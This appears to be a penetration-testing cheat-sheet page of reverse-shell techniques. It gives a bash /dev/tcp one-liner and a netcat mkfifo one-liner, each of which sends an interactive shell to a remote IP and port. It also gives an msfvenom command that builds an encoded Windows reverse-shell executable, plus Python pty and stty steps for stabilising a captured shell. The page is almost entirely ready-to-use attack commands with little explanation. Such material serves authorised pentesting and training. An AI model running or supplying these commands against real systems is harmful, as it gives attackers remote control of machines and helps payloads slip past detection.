Reverse Shell
One-Liners
Bash
bash -i >& /dev/tcp/<IP>/<port> 0>&1
Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
Sometimes one one-liner won't work, but another will. Two great cheatsheets are pentestmonkey and highoncoffee.
Generate Payload
Msfvenom
Windows reverse shell with encoder
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe
Shell Cushions
If the reverse shell is terminal-based some measures can be taken to make it more comfortable to use.
Spawn TTY
Python
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Additional ways to spawn TTY.
Auto-Completion
Background the process with Ctrl+z.
Execute this to disable echoing and send I/O straight through without processing.
stty raw -echo
return to the process with fg + Enter x2.
Last updated
Was this helpful?